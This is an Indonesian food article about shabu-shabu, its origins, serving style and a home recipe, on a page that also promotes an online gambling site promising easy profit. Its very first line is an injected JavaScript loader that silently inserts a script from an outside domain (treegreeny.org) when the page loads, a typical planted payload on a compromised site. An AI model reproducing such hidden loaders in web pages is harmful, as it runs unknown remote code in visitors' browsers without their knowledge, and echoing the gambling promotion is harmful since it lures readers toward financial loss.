;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); NIKMATI KELEZATAN MAKANAN SHABU-SHABU, MASAKAN KHAS JEPANG YANG SEDANG POPULER DI SELURUH DUNIA – SLOT MASA KINI

NIKMATI KELEZATAN MAKANAN SHABU-SHABU, MASAKAN KHAS JEPANG YANG SEDANG POPULER DI SELURUH DUNIA

0

Hidangan Kuno Asal China yang Populer di Jepang dan Korea

 

Sebelum membaca artikel kali ini, untuk kalian yang mau mendapatkan cuan yang banyak dengan bermodal sedikit langsung aja bergabung di situs gacor Okeplay777.

Makanan shabu-shabu adalah hidangan kuah Jepang yang terdiri dari daging tipis yang diiris tipis dan sayuran yang dimasak dalam panci berisi kaldu panas. Shabu-shabu terkenal karena kesederhanaan dan kelezatannya, serta fakta bahwa ia merupakan hidangan yang sehat dan bergizi. Dalam artikel ini, kami akan menjelaskan lebih lanjut tentang makanan shabu-shabu dan mengapa ia menjadi sangat populer di seluruh dunia.

Pertama-tama, mari kita bicarakan tentang sejarah makanan shabu-shabu. Hidangan ini awalnya berasal dari Tiongkok dan kemudian dibawa ke Jepang pada awal abad ke-20. Istilah “shabu-shabu” sebenarnya berasal dari suara yang dihasilkan ketika daging diiris tipis-tipis dan kemudian dicelupkan ke dalam kaldu panas. Proses ini dilakukan dengan gerakan cepat yang mirip dengan gerakan yang dilakukan saat mencuci baju dengan tangan (di Jepang, istilah “shabu” digunakan untuk menyebut mencuci baju dengan tangan).

Saat ini, makanan shabu-shabu sangat populer di Jepang dan juga di seluruh dunia. Banyak restoran Jepang di luar negeri yang menawarkan hidangan ini sebagai salah satu menu utama mereka. Kelezatan makanan shabu-shabu terletak pada kualitas bahan-bahan yang digunakan dan juga kaldu yang digunakan untuk merebusnya. Biasanya, daging yang digunakan adalah daging sapi, namun ada juga yang menggunakan daging ayam atau babi. Sayuran yang digunakan meliputi sawi, wortel, jamur, dan lain-lain. Kaldu yang digunakan umumnya terbuat dari tulang sapi, tulang ayam, atau ikan.

Makanan shabu-shabu juga dikenal sebagai hidangan yang sehat dan bergizi karena banyaknya sayuran dan daging tanpa lemak yang digunakan dalam hidangan ini. Selain itu, karena bahan-bahan dimasak dengan kaldu panas, banyak nutrisi yang terjaga dan tidak hilang selama proses memasak.

Untuk menikmati hidangan shabu-shabu, biasanya kita akan diberikan sebuah panci berisi kaldu panas di tengah meja dan potongan daging dan sayuran dihidangkan di atas nampan kecil. Setiap orang kemudian dapat memasak potongan daging dan sayuran mereka sendiri dalam panci kaldu panas. Biasanya, hidangan shabu-shabu disajikan dengan beberapa saus, seperti saus ponzu (saus yang terbuat dari campuran air jeruk lemon, kecap asin, dan mirin), saus goma (saus wijen), atau saus bawang putih.

Berikut adalah cara membuat Shabu-Shabu:

Bahan-bahan:

300g daging sapi sirloin (atau daging ayam atau babi)

200g sayuran seperti sawi, wortel, jamur, bok choy, dan lain-lain

1 liter air

1 buah bawang bombay, iris tipis

2 siung bawang putih, cincang halus

2 cm jahe, memarkan

2 sdm sake

2 sdm kecap asin

2 sdm mirin

Saus ponzu, saus goma, atau saus bawang putih untuk penyajian

Cara membuat:

Potong daging sapi menjadi irisan tipis. Bersihkan sayuran dan potong-potong sesuai selera.

Panaskan air dalam panci besar. Tambahkan bawang bombay, bawang putih, dan jahe. Masak selama beberapa menit hingga aroma harum.

Tambahkan sake, kecap asin, dan mirin ke dalam panci. Aduk rata dan biarkan mendidih.

Masukkan potongan daging sapi dan masak selama 30 detik hingga daging berubah warna dan matang. Angkat dan sisihkan daging di piring saji.

Masukkan sayuran ke dalam panci kaldu panas. Masak selama beberapa menit hingga sayuran terasa empuk namun masih renyah.

Angkat sayuran dan letakkan di piring saji bersama dengan daging sapi.

Sajikan hidangan Shabu-Shabu dengan saus ponzu, saus goma, atau saus bawang putih sebagai pelengkap.

Tips:

Sebaiknya gunakan daging sapi sirloin yang berlemak sedikit agar hasilnya lebih enak.

Kaldu bisa dimasak dengan tulang sapi atau tulang ayam untuk memberikan rasa yang lebih lezat.

Jangan terlalu lama memasak daging agar tidak terlalu kering atau keras.

Untuk variasi, Anda bisa menambahkan mie telur atau telur rebus ke dalam hidangan Shabu-Shabu.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *